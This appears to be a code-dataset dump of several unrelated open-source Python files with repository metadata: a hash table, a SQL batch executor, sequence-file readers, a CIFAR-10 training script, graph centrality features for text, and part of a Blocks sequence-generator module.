# 注意,这里按照链表的构造,只要查到这个值,是可以通过将它的下一个值赋给它,将下一个结点删掉的操作来进行的。
# 但是可能查到的这个值就是最后一个结点,那么上述方法行不通。
while node != None:
# 找到值了,停下来
if node.val == value:
break
else:
pre_node = pre_node.next
node = node.next
# 把node删除
pre_node.next = node.next
def search(self, value):
'''
从哈希表中查找一个值
:param value: 待查找的值
:return: 如果找到这个值,返回True;否则,返回False
'''
# 找到它的哈希位置
index = self._hash(value)
# 在链表中进行查询
node = self._table[index]
while node != None:
if node.val == value:
return True
node = node.next
# 如果走到这,肯定就没查找
return False
# ---------------------------- 私有方法 ----------------------------
def _hash(self, value):
'''
哈希函数,通过给定的值,计算出一个位置
:param value: 存入哈希表的值
:return: 散列表中的位置
'''
return value % self._table_size
# ---------------------------- 内部方法 ----------------------------
def __str__(self):
final_res = ""
for i in range(self._table_size):
res = []
node = self._table[i].next
while node != None:
res.append(str(node.val))
node = node.next
final_res += "索引为{}的位置的值为: {}\n".format(i, ",".join(res))
return final_res
if __name__ == "__main__":
ht = HashTable()
# 初始化
ht.init([2, 3, 5, 8, 9, 10, 2, 9, 1, 5, 2, 1, 7, 9, 11])
print("初始化后的哈希表为:\n{}".format(ht))
# 插入结点
ht.insert(9)
print("插入值后的哈希表为:\n{}".format(ht))
# 删除结点
ht.delete(11)
print("删除值后的哈希表为:\n{}".format(ht))
# 查找结点
res = ht.search(8)
print("查找值为8的结果为: {}".format(res))
| 23.644172
| 69
| 0.493254
| 4,575
| 0.879469
| 0
| 0
| 0
| 0
| 0
| 0
| 3,042
| 0.584775
|
3ba7a6554c459e41f8d769b9e6caea0153ae3a05
| 7,908
|
py
|
Python
|
ossdbtoolsservice/query/batch.py
|
DaeunYim/pgtoolsservice
|
b7e548718d797883027b2caee2d4722810b33c0f
|
[
"MIT"
] | 33
|
2019-05-27T13:04:35.000Z
|
2022-03-17T13:33:05.000Z
|
ossdbtoolsservice/query/batch.py
|
DaeunYim/pgtoolsservice
|
b7e548718d797883027b2caee2d4722810b33c0f
|
[
"MIT"
] | 31
|
2019-06-10T01:55:47.000Z
|
2022-03-09T07:27:49.000Z
|
ossdbtoolsservice/query/batch.py
|
DaeunYim/pgtoolsservice
|
b7e548718d797883027b2caee2d4722810b33c0f
|
[
"MIT"
] | 25
|
2019-05-13T18:39:24.000Z
|
2021-11-16T03:07:33.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from enum import Enum
from typing import List # noqa
from datetime import datetime
import uuid
import sqlparse
from ossdbtoolsservice.driver import ServerConnection
from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str
from ossdbtoolsservice.query.contracts import BatchSummary, SaveResultsRequestParams, SelectionData
from ossdbtoolsservice.query.result_set import ResultSet # noqa
from ossdbtoolsservice.query.file_storage_result_set import FileStorageResultSet
from ossdbtoolsservice.query.in_memory_result_set import InMemoryResultSet
from ossdbtoolsservice.query.data_storage import FileStreamFactory
from ossdbtoolsservice.utils.constants import PG_PROVIDER_NAME
class ResultSetStorageType(Enum):
IN_MEMORY = 1,
FILE_STORAGE = 2
class BatchEvents:
def __init__(self, on_execution_started=None, on_execution_completed=None, on_result_set_completed=None):
self._on_execution_started = on_execution_started
self._on_execution_completed = on_execution_completed
self._on_result_set_completed = on_result_set_completed
class SelectBatchEvents(BatchEvents):
def __init__(self, on_execution_started, on_execution_completed, on_result_set_completed, on_after_first_fetch):
BatchEvents.__init__(self, on_execution_started, on_execution_completed, on_result_set_completed)
self._on_after_first_fetch = on_after_first_fetch
class Batch:
def __init__(
self,
batch_text: str,
ordinal: int,
selection: SelectionData,
batch_events: BatchEvents = None,
storage_type: ResultSetStorageType = ResultSetStorageType.FILE_STORAGE
) -> None:
self.id = ordinal
self.selection = selection
self.batch_text = batch_text
self._execution_start_time: datetime = None
self._has_error = False
self._has_executed = False
self._execution_end_time: datetime = None
self._result_set: ResultSet = None
self._notices: List[str] = []
self._batch_events = batch_events
self._storage_type = storage_type
@property
def batch_summary(self) -> BatchSummary:
return BatchSummary.from_batch(self)
@property
def has_error(self) -> bool:
return self._has_error
@property
def has_executed(self) -> bool:
return self._has_executed
@property
def start_date_str(self) -> str:
if self._execution_start_time is None:
return None
return self._execution_start_time.isoformat()
@property
def start_time(self) -> str:
return get_time_str(self._execution_start_time)
@property
def end_time(self) -> str:
return get_time_str(self._execution_end_time)
@property
def elapsed_time(self) -> str:
return get_elapsed_time_str(self._execution_start_time, self._execution_end_time)
@property
def result_set(self) -> ResultSet:
return self._result_set
@property
def row_count(self) -> int:
return self.result_set.row_count if self.result_set is not None else -1
@property
def notices(self) -> List[str]:
return self._notices
def get_cursor(self, connection: ServerConnection):
return connection.cursor()
def execute(self, conn: ServerConnection) -> None:
"""
Execute the batch using a cursor retrieved from the given connection
:raises DatabaseError: if an error is encountered while running the batch's query
"""
self._execution_start_time = datetime.now()
if self._batch_events and self._batch_events._on_execution_started:
self._batch_events._on_execution_started(self)
cursor = self.get_cursor(conn)
try:
cursor.execute(self.batch_text)
# Commit the transaction if autocommit is True
if conn.autocommit:
conn.commit()
self.after_execute(cursor)
except conn.database_error as error:
self._has_error = True
raise error
finally:
# We are doing this because when the execute fails for named cursors
# cursor is not activated on the server which results in failure on close
# Hence we are checking if the cursor was really executed for us to close it
if cursor and cursor.rowcount != -1 and cursor.rowcount is not None:
cursor.close()
self._has_executed = True
self._execution_end_time = datetime.now()
# TODO: PyMySQL doesn't support notices from a connection
if conn._provider_name == PG_PROVIDER_NAME:
self._notices = cursor.connection.notices
cursor.connection.notices = []
if self._batch_events and self._batch_events._on_execution_completed:
self._batch_events._on_execution_completed(self)
def after_execute(self, cursor) -> None:
if cursor.description is not None:
self.create_result_set(cursor)
def create_result_set(self, cursor):
result_set = create_result_set(self._storage_type, 0, self.id)
result_set.read_result_to_end(cursor)
self._result_set = result_set
def get_subset(self, start_index: int, end_index: int):
return self._result_set.get_subset(start_index, end_index)
def save_as(self, params: SaveResultsRequestParams, file_factory: FileStreamFactory, on_success, on_failure) -> None:
if params.result_set_index != 0:
raise IndexError('Result set index should be always 0')
self._result_set.save_as(params, file_factory, on_success, on_failure)
class SelectBatch(Batch):
def __init__(self, batch_text: str, ordinal: int, selection: SelectionData, batch_events: SelectBatchEvents, storage_type: ResultSetStorageType) -> None:
Batch.__init__(self, batch_text, ordinal, selection, batch_events, storage_type)
def get_cursor(self, connection: ServerConnection):
cursor_name = str(uuid.uuid4())
# Named cursors can be created only in the transaction. As our connection has autocommit set to true
# there is not transaction concept with it so we need to have withhold to true and as this cursor is local
# and we explicitly close it we are good
return connection.cursor(name=cursor_name, withhold=True)
def after_execute(self, cursor) -> None:
super().create_result_set(cursor)
def create_result_set(storage_type: ResultSetStorageType, result_set_id: int, batch_id: int) -> ResultSet:
if storage_type is ResultSetStorageType.FILE_STORAGE:
return FileStorageResultSet(result_set_id, batch_id)
return InMemoryResultSet(result_set_id, batch_id)
def create_batch(batch_text: str, ordinal: int, selection: SelectionData, batch_events: BatchEvents, storage_type: ResultSetStorageType) -> Batch:
sql = sqlparse.parse(batch_text)
statement = sql[0]
if statement.get_type().lower() == 'select':
into_checker = [True for token in statement.tokens if token.normalized == 'INTO']
cte_checker = [True for token in statement.tokens if token.ttype == sqlparse.tokens.Keyword.CTE]
if len(into_checker) == 0 and len(cte_checker) == 0: # SELECT INTO and CTE keywords can't be used in named cursor
return SelectBatch(batch_text, ordinal, selection, batch_events, storage_type)
return Batch(batch_text, ordinal, selection, batch_events, storage_type)
| 38.38835
| 157
| 0.69221
| 5,822
| 0.736216
| 0
| 0
| 1,023
| 0.129363
| 0
| 0
| 1,213
| 0.153389
|
3ba806cb9a29badf3e7a080781be0d67fc995823
| 1,017
|
py
|
Python
|
seqlib.py
|
rvenkatesh99/sequence_alignment
|
107c262ef25ddbf025e054339bdd29efd728033a
|
[
"MIT"
] | null | null | null |
seqlib.py
|
rvenkatesh99/sequence_alignment
|
107c262ef25ddbf025e054339bdd29efd728033a
|
[
"MIT"
] | null | null | null |
seqlib.py
|
rvenkatesh99/sequence_alignment
|
107c262ef25ddbf025e054339bdd29efd728033a
|
[
"MIT"
] | null | null | null |
import gzip
def read_fasta(filename):
name = None
seqs = []
fp = None
if filename.endswith('.gz'):
fp = gzip.open(filename, 'rt')
else:
fp = open(filename)
for line in fp.readlines():
line = line.rstrip()
if line.startswith('>'):
if len(seqs) > 0:
seq = ''.join(seqs)
yield(name, seq)
name = line[1:]
seqs = []
else:
name = line[1:]
else:
seqs.append(line)
yield(name, ''.join(seqs))
fp.close()
def read_fastq(filename):
name = None
seqs = []
quals = []
fp = None
if filename.endswith('.gz'):
fp = gzip.open(filename, 'rt')
else:
fp = open(filename)
for line in fp.readlines():
line = line.rstrip()
if line.startswith('@'):
if len(seqs) > 0:
seq = ''.join(seqs)
qual = ''.join(quals)
yield(name, seq, qual)
name = line[1:]
seqs = []
quals = []
else:
name = line[1:]
elif line.startswith('+'):
continue
else:
seqs.append(line)
quals.append(line)
yield(name, ''.join(seqs), ''.join(quals))
fp.close()
| 17.237288
| 43
| 0.573255
| 0
| 0
| 1,001
| 0.984267
| 0
| 0
| 0
| 0
| 39
| 0.038348
|
3ba896ffed28499b8d1d9a50c6e51c5241f414aa
| 2,413
|
py
|
Python
|
train.py
|
adamian98/LabelNoiseFlatMinimizers
|
2c7a60ea0b72f8ac3a0ce3f059526440385b4f60
|
[
"MIT"
] | 7
|
2021-08-21T23:45:28.000Z
|
2021-12-13T13:39:38.000Z
|
train.py
|
adamian98/LabelNoiseFlatMinimizers
|
2c7a60ea0b72f8ac3a0ce3f059526440385b4f60
|
[
"MIT"
] | null | null | null |
train.py
|
adamian98/LabelNoiseFlatMinimizers
|
2c7a60ea0b72f8ac3a0ce3f059526440385b4f60
|
[
"MIT"
] | null | null | null |
import torch
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.loggers import WandbLogger
from pytorch_lightning.callbacks import LearningRateMonitor
from data import CIFAR10Data
from module import CIFAR10Module
from callbacks import *
from pathlib import Path
import wandb
from absl import app
from absl import flags
FLAGS = flags.FLAGS
flags.DEFINE_string("name", None, "name used for wandb logger")
flags.DEFINE_string("init", None, "initial weights to use")
flags.DEFINE_integer("max_epochs", 1000, "number of epochs to run for")
flags.DEFINE_integer("precision", 32, "precision to use")
flags.DEFINE_integer("seed", 0, "random seed")
flags.DEFINE_integer("num_workers", 4, "number of workers to use for data loading")
flags.DEFINE_string("save", None, "output file to save model weights")
flags.DEFINE_bool("callbacks", True, "whether to compute gradient callbacks")
flags.DEFINE_bool(
"fullbatch", False, "whether to aggregate batches to emulate full batch training"
)
def main(argv):
seed_everything(FLAGS.seed)
logger = WandbLogger(project="colt_final", name=FLAGS.name)
logger.experiment.config.update(FLAGS)
model = CIFAR10Module()
if FLAGS.init is not None:
model.load_state_dict(torch.load(Path(FLAGS.init)))
data = CIFAR10Data()
if FLAGS.callbacks:
callbacks = [
LearningRateMonitor(log_momentum=True),
TimeEpoch(),
TotalGradient(),
WeightNorm(),
]
else:
callbacks = [LearningRateMonitor(log_momentum=True), TimeEpoch()]
if FLAGS.fullbatch:
accumulate_grad_batches = 50000 // FLAGS.batch_size
log_every_n_steps = 1
else:
accumulate_grad_batches = 1
log_every_n_steps = 50
trainer = Trainer(
logger=logger,
gpus=1,
max_epochs=FLAGS.max_epochs,
callbacks=callbacks,
progress_bar_refresh_rate=50,
log_every_n_steps=log_every_n_steps,
precision=FLAGS.precision,
deterministic=True,
benchmark=True,
terminate_on_nan=True,
accumulate_grad_batches=accumulate_grad_batches,
)
trainer.fit(model, data)
if FLAGS.save:
save_file = Path(FLAGS.save)
save_file.parent.mkdir(exist_ok=True, parents=True)
torch.save(model.state_dict(), save_file)
if __name__ == "__main__":
app.run(main)
| 30.544304
| 85
| 0.703274
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 394
| 0.163282
|
3ba9c357940e99f10b2151b5ccc410817c1d8e70
| 10,559
|
py
|
Python
|
test/lda/createGraphFeatures.py
|
bekou/graph-topic-model
|
7bd99aede6c22675f738166e690174ae0917b9eb
|
[
"MIT"
] | 6
|
2020-01-17T13:23:35.000Z
|
2022-01-15T22:49:34.000Z
|
learn/lda/createGraphFeatures.py
|
bekou/graph-topic-model
|
7bd99aede6c22675f738166e690174ae0917b9eb
|
[
"MIT"
] | null | null | null |
learn/lda/createGraphFeatures.py
|
bekou/graph-topic-model
|
7bd99aede6c22675f738166e690174ae0917b9eb
|
[
"MIT"
] | 1
|
2019-05-26T15:57:35.000Z
|
2019-05-26T15:57:35.000Z
|
import networkx as nx
import string
import numpy as np
import math
def degree_centrality(G):
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.degree_iter())
return centrality
def in_degree_centrality(G):
if not G.is_directed():
raise nx.NetworkXError("in_degree_centrality() not defined for undirected graphs.")
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.in_degree_iter())
return centrality
def out_degree_centrality(G):
if not G.is_directed():
raise nx.NetworkXError("out_degree_centrality() not defined for undirected graphs.")
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.out_degree_iter())
return centrality
def weighted_centrality(G):
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.degree_iter(weight='weight'))
return centrality
def createGraphFeatures(num_documents,clean_train_documents,unique_words,sliding_window,b,idf_par,centrality_par,centrality_col_par):
features = np.zeros((num_documents,len(unique_words)))
term_num_docs = {}
print "Creating the graph of words for collection..."
if centrality_col_par=="pagerank_centrality" or centrality_col_par=="out_degree_centrality" or centrality_col_par=="in_degree_centrality" or centrality_col_par=="betweenness_centrality_directed" or centrality_col_par=="closeness_centrality_directed":
dGcol = nx.DiGraph()
else:
dGcol = nx.Graph()
totalLen = 0
for i in range(0,num_documents):
#dG = nx.Graph()
found_unique_words = []
wordList1 = clean_train_documents[i].split(None)
wordList2 = [string.rstrip(x.lower(), ',.!?;') for x in wordList1]
docLen = len(wordList2)
totalLen += docLen
# print clean_train_documents[i]
for k, word in enumerate(wordList2):
if word not in found_unique_words:
found_unique_words.append(word)
if word not in term_num_docs:
term_num_docs[word] = 1
else:
term_num_docs[word] += 1
for j in xrange(1,sliding_window):
try:
next_word = wordList2[k + j]
if not dGcol.has_node(word):
dGcol.add_node(word)
dGcol.node[word]['count'] = 1
else:
dGcol.node[word]['count'] += 1
if not dGcol.has_node(next_word):
dGcol.add_node(next_word)
dGcol.node[next_word]['count'] = 0
if not dGcol.has_edge(word, next_word):
dGcol.add_edge(word, next_word, weight = 1)
else:
dGcol.edge[word][next_word]['weight'] += 1
except IndexError:
if not dGcol.has_node(word):
dGcol.add_node(word)
dGcol.node[word]['count'] = 1
else:
dGcol.node[word]['count'] += 1
except:
raise
avgLen = float(totalLen)/num_documents
print "Number of nodes in collection graph:"+str(dGcol.number_of_nodes())
print "Number of edges in collection graph:"+str(dGcol.number_of_edges())
print "Average document length:"+str(avgLen)
print "Number of self-loops for collection graph:"+str(dGcol.number_of_selfloops())
if idf_par=="icw":
icw_col = {}
dGcol.remove_edges_from(dGcol.selfloop_edges())
nx.write_edgelist(dGcol, "test.edgelist")
if centrality_col_par=="degree_centrality":
centrality_col = nx.degree_centrality(dGcol)
elif centrality_col_par=="pagerank_centrality":
centrality_col = pg.pagerank(dGcol)
# centrality_col = nx.pagerank(dGcol)
elif centrality_col_par=="eigenvector_centrality":
centrality_col = nx.eigenvector_centrality(dGcol,max_iter=10000,weight="weight")
elif centrality_col_par=="katz_centrality":
centrality_col = nx.katz_centrality(dGcol)
elif centrality_col_par=="betweenness_centrality" or centrality_col_par=="betweenness_centrality_directed":
centrality_col = nx.betweenness_centrality(dGcol)
elif centrality_col_par=="triangles":
centrality_col = nx.triangles(dGcol)
elif centrality_col_par=="clustering_coefficient":
centrality_col = nx.clustering(dGcol)
elif centrality_col_par=="in_degree_centrality":
centrality_col = nx.in_degree_centrality(dGcol)
elif centrality_col_par=="out_degree_centrality":
centrality_col = nx.out_degree_centrality(dGcol)
elif centrality_col_par=="core_number":
centrality_col = nx.core_number(dGcol)
elif centrality_col_par=="closeness_centrality" or centrality_col_par=="closeness_centrality_directed":
centrality_col = nx.closeness_centrality(dGcol,normalized=False)
elif centrality_col_par=="communicability_centrality":
centrality_col = nx.communicability_centrality(dGcol)
centr_sum = sum(centrality_col.values())
for k, g in enumerate(dGcol.nodes()):
if centrality_col[g]>0:
icw_col[g] = math.log10((float(centr_sum)) / (centrality_col[g]))
else:
icw_col[g] = 0
idf_col = {}
for x in term_num_docs:
idf_col[x] = math.log10((float(num_documents)+1.0) / (term_num_docs[x]))
print "Creating the graph of words for each document..."
totalNodes = 0
totalEdges = 0
for i in range( 0,num_documents ):
if centrality_par=="pagerank_centrality" or centrality_par=="out_degree_centrality" or centrality_par=="in_degree_centrality" or centrality_par=="betweenness_centrality_directed" or centrality_par=="closeness_centrality_directed":
dG = nx.DiGraph()
else:
dG = nx.Graph()
wordList1 = clean_train_documents[i].split(None)
wordList2 = [string.rstrip(x.lower(), ',.!?;') for x in wordList1]
docLen = len(wordList2)
if docLen==2 :
print wordList2
if docLen>1 and wordList2[0]!=wordList2[1] :
# print clean_train_documents[i]
for k, word in enumerate(wordList2):
for j in xrange(1,sliding_window):
try:
next_word = wordList2[k + j]
if not dG.has_node(word):
dG.add_node(word)
dG.node[word]['count'] = 1
else:
dG.node[word]['count'] += 1
if not dG.has_node(next_word):
dG.add_node(next_word)
dG.node[next_word]['count'] = 0
if not dG.has_edge(word, next_word):
dG.add_edge(word, next_word, weight = 1)
else:
dG.edge[word][next_word]['weight'] += 1
except IndexError:
if not dG.has_node(word):
dG.add_node(word)
dG.node[word]['count'] = 1
else:
dG.node[word]['count'] += 1
except:
raise
dG.remove_edges_from(dG.selfloop_edges())
if centrality_par=="degree_centrality":
#centrality = nx.degree_centrality(dG)
centrality=degree_centrality(dG)
elif centrality_par=="clustering_coefficient":
centrality = nx.clustering(dG)
elif centrality_par=="pagerank_centrality":
# centrality = pg.pagerank(dG,max_iter=10000)
centrality = nx.pagerank(dG)
elif centrality_par=="eigenvector_centrality":
centrality=nx.eigenvector_centrality(dG,max_iter=10000)
elif centrality_par=="katz_centrality":
centrality = nx.katz_centrality(dG,normalized=False)
elif centrality_par=="betweenness_centrality" or centrality_par=="betweenness_centrality_directed":
centrality = nx.betweenness_centrality(dG,normalized=False)
elif centrality_par=="triangles":
centrality = nx.triangles(dG)
elif centrality_par=="in_degree_centrality":
centrality = in_degree_centrality(dG)
elif centrality_par=="out_degree_centrality":
centrality = out_degree_centrality(dG)
elif centrality_par=="core_number":
centrality = nx.core_number(dG)
elif centrality_par=="weighted_centrality":
centrality = weighted_centrality(dG)
elif centrality_par=="closeness_centrality" or centrality_par=="closeness_centrality_directed":
centrality = nx.closeness_centrality(dG,normalized=False)
elif centrality_par=="communicability_centrality":
centrality = nx.communicability_centrality(dG)
totalNodes += dG.number_of_nodes()
totalEdges += dG.number_of_edges()
#print "Number of self-loops:"+str(dG.number_of_selfloops())
#centrality = nx.out_degree_centrality(dG)
#centrality = nx.katz_centrality(dG,max_iter=10000)
for k, g in enumerate(dG.nodes()):
# Degree centrality (local feature)
if g in unique_words:
#features[i,unique_words.index(g)] = dG.degree(nbunch=g,weight='weight') * idf_col[g]
if idf_par=="no":
features[i,unique_words.index(g)] = centrality[g]#centrality[g]/(1-b+(b*(float(docLen)/avgLen)))dG.node[g]['count']
elif idf_par=="idf":
features[i,unique_words.index(g)] = (centrality[g]/(1-b+(b*(float(docLen)/avgLen)))) * idf_col[g]
elif idf_par=="icw":
features[i,unique_words.index(g)] = (centrality[g]/(1-b+(b*(float(docLen)/avgLen)))) * icw_col[g]
print "Average number of nodes:"+str(float(totalNodes)/num_documents)
print "Average number of edges:"+str(float(totalEdges)/num_documents)
return features
| 43.632231
| 254
| 0.58604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,008
| 0.19017
|
3bab2d583dbdb20d52e61488899227c07f7c4954
| 30,867
|
py
|
Python
|
blocks/bricks/sequence_generators.py
|
KIKOcaoyue/blocks
|
dfbeb400cfacfc1abe75e377cc03c1bf61b9c2fa
|
[
"BSD-3-Clause"
] | 1,067
|
2015-05-16T23:39:15.000Z
|
2019-02-10T13:33:00.000Z
|
blocks/bricks/sequence_generators.py
|
loveisbasa/blocks
|
7f380deec8f810b390880e6a4de836115e6e478d
|
[
"BSD-3-Clause"
] | 577
|
2015-05-16T18:52:53.000Z
|
2018-11-27T15:31:09.000Z
|
blocks/bricks/sequence_generators.py
|
loveisbasa/blocks
|
7f380deec8f810b390880e6a4de836115e6e478d
|
[
"BSD-3-Clause"
] | 379
|
2015-05-21T03:24:04.000Z
|
2019-01-29T02:55:00.000Z
|
"""Sequence generation framework.
Recurrent networks are often used to generate/model sequences.
Examples include language modelling, machine translation, handwriting
synthesis, etc.. A typical pattern in this context is that
sequence elements are generated one often another, and every generated
element is fed back into the recurrent network state. Sometimes
also an attention mechanism is used to condition sequence generation
on some structured input like another sequence or an image.
This module provides :class:`SequenceGenerator` that builds a sequence
generating network from three main components:
* a core recurrent transition, e.g. :class:`~blocks.bricks.recurrent.LSTM`
or :class:`~blocks.bricks.recurrent.GatedRecurrent`
* a readout component that can produce sequence elements using
the network state and the information from the attention mechanism
* an attention mechanism (see :mod:`~blocks.bricks.attention` for
more information)
Implementation-wise :class:`SequenceGenerator` fully relies on
:class:`BaseSequenceGenerator`. At the level of the latter an
attention is mandatory, moreover it must be a part of the recurrent
transition (see :class:`~blocks.bricks.attention.AttentionRecurrent`).
To simulate optional attention, :class:`SequenceGenerator` wraps the
pure recurrent network in :class:`FakeAttentionRecurrent`.
"""
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from theano import tensor
from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax
from blocks.bricks.base import application, Brick, lazy
from blocks.bricks.parallel import Fork, Merge
from blocks.bricks.lookup import LookupTable
from blocks.bricks.recurrent import recurrent
from blocks.bricks.attention import (
AbstractAttentionRecurrent, AttentionRecurrent)
from blocks.roles import add_role, COST
from blocks.utils import dict_union, dict_subset
class BaseSequenceGenerator(Initializable):
r"""A generic sequence generator.
This class combines two components, a readout network and an
attention-equipped recurrent transition, into a context-dependent
sequence generator. Third component must be also given which
forks feedback from the readout network to obtain inputs for the
transition.
The class provides two methods: :meth:`generate` and :meth:`cost`. The
former is to actually generate sequences and the latter is to compute
the cost of generating given sequences.
The generation algorithm description follows.
**Definitions and notation:**
* States :math:`s_i` of the generator are the states of the transition
as specified in `transition.state_names`.
* Contexts of the generator are the contexts of the
transition as specified in `transition.context_names`.
* Glimpses :math:`g_i` are intermediate entities computed at every
generation step from states, contexts and the previous step glimpses.
They are computed in the transition's `apply` method when not given
or by explicitly calling the transition's `take_glimpses` method. The
set of glimpses considered is specified in
`transition.glimpse_names`.
* Outputs :math:`y_i` are produced at every step and form the output
sequence. A generation cost :math:`c_i` is assigned to each output.
**Algorithm:**
1. Initialization.
.. math::
y_0 = readout.initial\_outputs(contexts)\\
s_0, g_0 = transition.initial\_states(contexts)\\
i = 1\\
By default all recurrent bricks from :mod:`~blocks.bricks.recurrent`
have trainable initial states initialized with zeros. Subclass them
or :class:`~blocks.bricks.recurrent.BaseRecurrent` directly to get
custom initial states.
2. New glimpses are computed:
.. math:: g_i = transition.take\_glimpses(
s_{i-1}, g_{i-1}, contexts)
3. A new output is generated by the readout and its cost is
computed:
.. math::
f_{i-1} = readout.feedback(y_{i-1}) \\
r_i = readout.readout(f_{i-1}, s_{i-1}, g_i, contexts) \\
y_i = readout.emit(r_i) \\
c_i = readout.cost(r_i, y_i)
Note that the *new* glimpses and the *old* states are used at this
step. The reason for not merging all readout methods into one is
to make an efficient implementation of :meth:`cost` possible.
4. New states are computed and iteration is done:
.. math::
f_i = readout.feedback(y_i) \\
s_i = transition.compute\_states(s_{i-1}, g_i,
fork.apply(f_i), contexts) \\
i = i + 1
5. Back to step 2 if the desired sequence
length has not been yet reached.
| A scheme of the algorithm described above follows.
.. image:: /_static/sequence_generator_scheme.png
:height: 500px
:width: 500px
..
Parameters
----------
readout : instance of :class:`AbstractReadout`
The readout component of the sequence generator.
transition : instance of :class:`AbstractAttentionRecurrent`
The transition component of the sequence generator.
fork : :class:`~.bricks.Brick`
The brick to compute the transition's inputs from the feedback.
See Also
--------
:class:`.Initializable` : for initialization parameters
:class:`SequenceGenerator` : more user friendly interface to this\
brick
"""
@lazy()
def __init__(self, readout, transition, fork, **kwargs):
self.readout = readout
self.transition = transition
self.fork = fork
children = [self.readout, self.fork, self.transition]
kwargs.setdefault('children', []).extend(children)
super(BaseSequenceGenerator, self).__init__(**kwargs)
@property
def _state_names(self):
return self.transition.compute_states.outputs
@property
def _context_names(self):
return self.transition.apply.contexts
@property
def _glimpse_names(self):
return self.transition.take_glimpses.outputs
def _push_allocation_config(self):
# Configure readout. That involves `get_dim` requests
# to the transition. To make sure that it answers
# correctly we should finish its configuration first.
self.transition.push_allocation_config()
transition_sources = (self._state_names + self._context_names +
self._glimpse_names)
self.readout.source_dims = [self.transition.get_dim(name)
if name in transition_sources
else self.readout.get_dim(name)
for name in self.readout.source_names]
# Configure fork. For similar reasons as outlined above,
# first push `readout` configuration.
self.readout.push_allocation_config()
feedback_name, = self.readout.feedback.outputs
self.fork.input_dim = self.readout.get_dim(feedback_name)
self.fork.output_dims = self.transition.get_dims(
self.fork.apply.outputs)
@application
def cost(self, application_call, outputs, mask=None, **kwargs):
"""Returns the average cost over the minibatch.
The cost is computed by averaging the sum of per token costs for
each sequence over the minibatch.
.. warning::
Note that, the computed cost can be problematic when batches
consist of vastly different sequence lengths.
Parameters
----------
outputs : :class:`~tensor.TensorVariable`
The 3(2) dimensional tensor containing output sequences.
The axis 0 must stand for time, the axis 1 for the
position in the batch.
mask : :class:`~tensor.TensorVariable`
The binary matrix identifying fake outputs.
Returns
-------
cost : :class:`~tensor.Variable`
Theano variable for cost, computed by summing over timesteps
and then averaging over the minibatch.
Notes
-----
The contexts are expected as keyword arguments.
Adds average cost per sequence element `AUXILIARY` variable to
the computational graph with name ``per_sequence_element``.
"""
# Compute the sum of costs
costs = self.cost_matrix(outputs, mask=mask, **kwargs)
cost = tensor.mean(costs.sum(axis=0))
add_role(cost, COST)
# Add auxiliary variable for per sequence element cost
application_call.add_auxiliary_variable(
(costs.sum() / mask.sum()) if mask is not None else costs.mean(),
name='per_sequence_element')
return cost
@application
def cost_matrix(self, application_call, outputs, mask=None, **kwargs):
"""Returns generation costs for output sequences.
See Also
--------
:meth:`cost` : Scalar cost.
"""
# We assume the data has axes (time, batch, features, ...)
batch_size = outputs.shape[1]
# Prepare input for the iterative part
states = dict_subset(kwargs, self._state_names, must_have=False)
# masks in context are optional (e.g. `attended_mask`)
contexts = dict_subset(kwargs, self._context_names, must_have=False)
feedback = self.readout.feedback(outputs)
inputs = self.fork.apply(feedback, as_dict=True)
# Run the recurrent network
results = self.transition.apply(
mask=mask, return_initial_states=True, as_dict=True,
**dict_union(inputs, states, contexts))
# Separate the deliverables. The last states are discarded: they
# are not used to predict any output symbol. The initial glimpses
# are discarded because they are not used for prediction.
# Remember, glimpses are computed _before_ output stage, states are
# computed after.
states = {name: results[name][:-1] for name in self._state_names}
glimpses = {name: results[name][1:] for name in self._glimpse_names}
# Compute the cost
feedback = tensor.roll(feedback, 1, 0)
feedback = tensor.set_subtensor(
feedback[0],
self.readout.feedback(self.readout.initial_outputs(batch_size)))
readouts = self.readout.readout(
feedback=feedback, **dict_union(states, glimpses, contexts))
costs = self.readout.cost(readouts, outputs)
if mask is not None:
costs *= mask
for name, variable in list(glimpses.items()) + list(states.items()):
application_call.add_auxiliary_variable(
variable.copy(), name=name)
# This variables can be used to initialize the initial states of the
# next batch using the last states of the current batch.
for name in self._state_names + self._glimpse_names:
application_call.add_auxiliary_variable(
results[name][-1].copy(), name=name+"_final_value")
return costs
@recurrent
def generate(self, outputs, **kwargs):
"""A sequence generation step.
Parameters
----------
outputs : :class:`~tensor.TensorVariable`
The outputs from the previous step.
Notes
-----
The contexts, previous states and glimpses are expected as keyword
arguments.
"""
states = dict_subset(kwargs, self._state_names)
# masks in context are optional (e.g. `attended_mask`)
contexts = dict_subset(kwargs, self._context_names, must_have=False)
glimpses = dict_subset(kwargs, self._glimpse_names)
next_glimpses = self.transition.take_glimpses(
as_dict=True, **dict_union(states, glimpses, contexts))
next_readouts = self.readout.readout(
feedback=self.readout.feedback(outputs),
**dict_union(states, next_glimpses, contexts))
next_outputs = self.readout.emit(next_readouts)
next_costs = self.readout.cost(next_readouts, next_outputs)
next_feedback = self.readout.feedback(next_outputs)
next_inputs = (self.fork.apply(next_feedback, as_dict=True)
if self.fork else {'feedback': next_feedback})
next_states = self.transition.compute_states(
as_list=True,
**dict_union(next_inputs, states, next_glimpses, contexts))
return (next_states + [next_outputs] +
list(next_glimpses.values()) + [next_costs])
@generate.delegate
def generate_delegate(self):
return self.transition.apply
@generate.property('states')
def generate_states(self):
return self._state_names + ['outputs'] + self._glimpse_names
@generate.property('outputs')
def generate_outputs(self):
return (self._state_names + ['outputs'] +
self._glimpse_names + ['costs'])
def get_dim(self, name):
if name in (self._state_names + self._context_names +
self._glimpse_names):
return self.transition.get_dim(name)
elif name == 'outputs':
return self.readout.get_dim(name)
return super(BaseSequenceGenerator, self).get_dim(name)
@application
def initial_states(self, batch_size, *args, **kwargs):
# TODO: support dict of outputs for application methods
# to simplify this code.
state_dict = dict(
self.transition.initial_states(
batch_size, as_dict=True, *args, **kwargs),
outputs=self.readout.initial_outputs(batch_size))
